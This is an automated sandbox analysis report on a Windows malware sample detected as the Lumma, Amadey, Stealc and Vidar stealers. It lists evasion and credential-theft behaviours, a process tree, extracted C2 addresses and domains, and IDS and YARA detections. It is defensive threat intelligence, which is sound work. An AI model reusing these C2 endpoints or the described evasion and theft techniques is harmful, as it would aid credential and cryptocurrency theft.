Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1556476
MD5:	a8916b1db51981824cf0545df6864fb9
SHA1:	1faea8faf266fd74109256096cc1dce4acb9298b
SHA256:	bc6ce7042e0b92a139c10c803493adc1c87bddb4fe2f9f44a9f2a052833960e8
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, LummaC Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

C2 URLs / IPs found in malware configuration

Creates multiple autostart registry keys

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Drops PE files to the document folder of the user

Drops PE files to the user root directory

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies windows update settings

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sigma detected: New RUN Key Pointing to Suspicious Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the user directory

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: Browser Started with Remote Debugging

Sigma detected: CurrentVersion Autorun Keys Modification

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 4940 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A8916B1DB51981824CF0545DF6864FB9)

chrome.exe (PID: 1432 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7228 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2184,i,1981261483455303516,8832434919170921423,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cmd.exe (PID: 8096 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsGDHIDHIEGI.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

DocumentsGDHIDHIEGI.exe (PID: 7832 cmdline: "C:\Users\user\DocumentsGDHIDHIEGI.exe" MD5: 314E0BB891690BF44AB39895FC0AC49F)

skotes.exe (PID: 7416 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 314E0BB891690BF44AB39895FC0AC49F)

svchost.exe (PID: 1508 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

skotes.exe (PID: 2504 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 314E0BB891690BF44AB39895FC0AC49F)

stories.exe (PID: 7276 cmdline: "C:\Users\user\AppData\Local\Temp\1006431001\stories.exe" MD5: CBB34D95217826F4AD877E7E7A46B69C)

stories.tmp (PID: 7396 cmdline: "C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp" /SL5="$40464,5532893,721408,C:\Users\user\AppData\Local\Temp\1006431001\stories.exe" MD5: D39963C7160D31F9EF536BECF3004498)

net.exe (PID: 4324 cmdline: "C:\Windows\system32\net.exe" pause shine-encoder_11152 MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 4312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 6284 cmdline: C:\Windows\system32\net1 pause shine-encoder_11152 MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

shineencoder32.exe (PID: 7476 cmdline: "C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe" -i MD5: F978D5EBA9977AF32374DCB616CB63FE)

e708276138.exe (PID: 5960 cmdline: "C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe" MD5: EC1204EE4264E2DDE75A9BADC5023363)

chrome.exe (PID: 5436 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=e708276138.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5440 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2060,i,14162589029449352878,1805181848931644681,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5228 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3924 --field-trial-handle=2060,i,14162589029449352878,1805181848931644681,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 8188 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=e708276138.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7536 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1924,i,14623625801092511307,12696391534601995446,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

df5dd36577.exe (PID: 6216 cmdline: "C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe" MD5: A8916B1DB51981824CF0545DF6864FB9)

skotes.exe (PID: 7488 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 314E0BB891690BF44AB39895FC0AC49F)

76f1524c8d.exe (PID: 8040 cmdline: "C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe" MD5: 273688D08CE0EDD09E29A0A0D2FEAF6D)

e708276138.exe (PID: 6304 cmdline: "C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe" MD5: EC1204EE4264E2DDE75A9BADC5023363)

chrome.exe (PID: 3900 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=e708276138.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5168 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1180,i,9199522275752105245,15010947955167671813,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7696 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=e708276138.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 8124 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=2008,i,10237018931466361704,17092853076335079312,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

e708276138.exe (PID: 4484 cmdline: "C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe" MD5: EC1204EE4264E2DDE75A9BADC5023363)

df5dd36577.exe (PID: 7676 cmdline: "C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe" MD5: A8916B1DB51981824CF0545DF6864FB9)

e708276138.exe (PID: 2716 cmdline: "C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe" MD5: EC1204EE4264E2DDE75A9BADC5023363)

e708276138.exe (PID: 6324 cmdline: "C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe" MD5: EC1204EE4264E2DDE75A9BADC5023363)

chrome.exe (PID: 7632 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=e708276138.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 2124 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2004 --field-trial-handle=1884,i,5161667279183471165,5132445376536631529,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

76f1524c8d.exe (PID: 7732 cmdline: "C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe" MD5: 273688D08CE0EDD09E29A0A0D2FEAF6D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Threatname: LummaC

{"C2 url": ["3xc1aimbl0w.sbs", "faintbl0w.sbs", "300snails.sbs", "thicktoys.sbs"], "Build id": "LOGS11--LiveTraffic"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000019.00000002.2861182508.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000015.00000003.2731254010.00000000013B0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000015.00000003.2754591529.00000000013B0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000019.00000003.2815171977.0000000004A70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000009.00000002.2128190880.0000000000681000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000015.00000003.2733750270.00000000013B0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2633611345.0000000004A70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000019.00000002.2858405616.00000000000B1000.00000040.00000001.01000000.00000015.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000023.00000003.3158403320.000000000121D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2043049111.00000000007F1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000A.00000002.2142964969.00000000005D1000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000017.00000003.2847172731.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1717266617.00000000052D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2044630050.000000000160E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000017.00000003.2845226823.0000000000E88000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.2677024586.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2044630050.0000000001683000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.2675232544.00000000000B1000.00000040.00000001.01000000.00000015.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 4940	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 4940	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 4940	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 4940	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: e708276138.exe PID: 5960	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: e708276138.exe PID: 5960	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: df5dd36577.exe PID: 6216	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: df5dd36577.exe PID: 6216	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: e708276138.exe PID: 6304	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: e708276138.exe PID: 4484	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: e708276138.exe PID: 4484	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: df5dd36577.exe PID: 7676	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: df5dd36577.exe PID: 7676	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: e708276138.exe PID: 2716	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: e708276138.exe PID: 6324	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.DocumentsGDHIDHIEGI.exe.680000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
10.2.skotes.exe.5d0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 2504, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e708276138.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4940, ParentProcessName: file.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", ProcessId: 1432, ProcessName: chrome.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 2504, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e708276138.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1508, ProcessName: svchost.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T14:10:29.119818+0100	2028371	3	Unknown Traffic	192.168.2.4	49932	104.21.80.55	443	TCP
2024-11-15T14:10:30.456945+0100	2028371	3	Unknown Traffic	192.168.2.4	49940	104.21.80.55	443	TCP
2024-11-15T14:10:32.033894+0100	2028371	3	Unknown Traffic	192.168.2.4	49950	104.21.80.55	443	TCP
2024-11-15T14:10:33.684895+0100	2028371	3	Unknown Traffic	192.168.2.4	49961	104.21.80.55	443	TCP
2024-11-15T14:10:35.264497+0100	2028371	3	Unknown Traffic	192.168.2.4	49972	104.21.80.55	443	TCP
2024-11-15T14:10:37.511970+0100	2028371	3	Unknown Traffic	192.168.2.4	49983	104.21.80.55	443	TCP
2024-11-15T14:10:40.979850+0100	2028371	3	Unknown Traffic	192.168.2.4	50002	104.21.80.55	443	TCP
2024-11-15T14:10:41.585296+0100	2028371	3	Unknown Traffic	192.168.2.4	50005	104.21.80.55	443	TCP
2024-11-15T14:10:42.887400+0100	2028371	3	Unknown Traffic	192.168.2.4	50015	104.21.80.55	443	TCP
2024-11-15T14:10:44.623138+0100	2028371	3	Unknown Traffic	192.168.2.4	50027	104.21.80.55	443	TCP
2024-11-15T14:10:46.036185+0100	2028371	3	Unknown Traffic	192.168.2.4	50032	104.21.80.55	443	TCP
2024-11-15T14:10:47.927013+0100	2028371	3	Unknown Traffic	192.168.2.4	50044	104.21.80.55	443	TCP
2024-11-15T14:10:48.524637+0100	2028371	3	Unknown Traffic	192.168.2.4	50048	104.21.80.55	443	TCP
2024-11-15T14:10:49.449018+0100	2028371	3	Unknown Traffic	192.168.2.4	50055	104.21.80.55	443	TCP
2024-11-15T14:10:51.489606+0100	2028371	3	Unknown Traffic	192.168.2.4	50056	104.21.80.55	443	TCP
2024-11-15T14:10:51.491371+0100	2028371	3	Unknown Traffic	192.168.2.4	50057	104.21.80.55	443	TCP
2024-11-15T14:10:53.162264+0100	2028371	3	Unknown Traffic	192.168.2.4	50059	104.21.80.55	443	TCP
2024-11-15T14:10:53.378380+0100	2028371	3	Unknown Traffic	192.168.2.4	50060	104.21.80.55	443	TCP
2024-11-15T14:10:55.227472+0100	2028371	3	Unknown Traffic	192.168.2.4	50062	104.21.80.55	443	TCP
2024-11-15T14:10:56.045904+0100	2028371	3	Unknown Traffic	192.168.2.4	50063	104.21.80.55	443	TCP
2024-11-15T14:10:57.131119+0100	2028371	3	Unknown Traffic	192.168.2.4	50064	104.21.80.55	443	TCP
2024-11-15T14:11:00.314595+0100	2028371	3	Unknown Traffic	192.168.2.4	50074	104.21.80.55	443	TCP
2024-11-15T14:11:03.705405+0100	2028371	3	Unknown Traffic	192.168.2.4	50080	104.21.80.55	443	TCP
2024-11-15T14:11:04.809709+0100	2028371	3	Unknown Traffic	192.168.2.4	50087	104.21.80.55	443	TCP
2024-11-15T14:11:08.168703+0100	2028371	3	Unknown Traffic	192.168.2.4	50101	104.21.80.55	443	TCP
2024-11-15T14:11:10.229783+0100	2028371	3	Unknown Traffic	192.168.2.4	50107	104.21.80.55	443	TCP
2024-11-15T14:11:20.081788+0100	2028371	3	Unknown Traffic	192.168.2.4	50124	104.21.80.55	443	TCP
2024-11-15T14:11:21.460403+0100	2028371	3	Unknown Traffic	192.168.2.4	50128	104.21.80.55	443	TCP
2024-11-15T14:11:23.907790+0100	2028371	3	Unknown Traffic	192.168.2.4	50132	104.21.80.55	443	TCP
2024-11-15T14:11:25.691175+0100	2028371	3	Unknown Traffic	192.168.2.4	50137	104.21.80.55	443	TCP
2024-11-15T14:11:27.726504+0100	2028371	3	Unknown Traffic	192.168.2.4	50140	104.21.80.55	443	TCP
2024-11-15T14:11:30.464211+0100	2028371	3	Unknown Traffic	192.168.2.4	50145	104.21.80.55	443	TCP
2024-11-15T14:11:32.697726+0100	2028371	3	Unknown Traffic	192.168.2.4	50149	104.21.80.55	443	TCP
2024-11-15T14:11:35.124106+0100	2028371	3	Unknown Traffic	192.168.2.4	50154	104.21.80.55	443	TCP
2024-11-15T14:13:56.686209+0100	2028371	3	Unknown Traffic	192.168.2.4	50370	52.182.141.63	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T14:10:29.700115+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49932	104.21.80.55	443	TCP
2024-11-15T14:10:30.949764+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49940	104.21.80.55	443	TCP
2024-11-15T14:10:42.130405+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50005	104.21.80.55	443	TCP
2024-11-15T14:10:43.389192+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50015	104.21.80.55	443	TCP
2024-11-15T14:10:48.431860+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50044	104.21.80.55	443	TCP
2024-11-15T14:10:50.060355+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50055	104.21.80.55	443	TCP
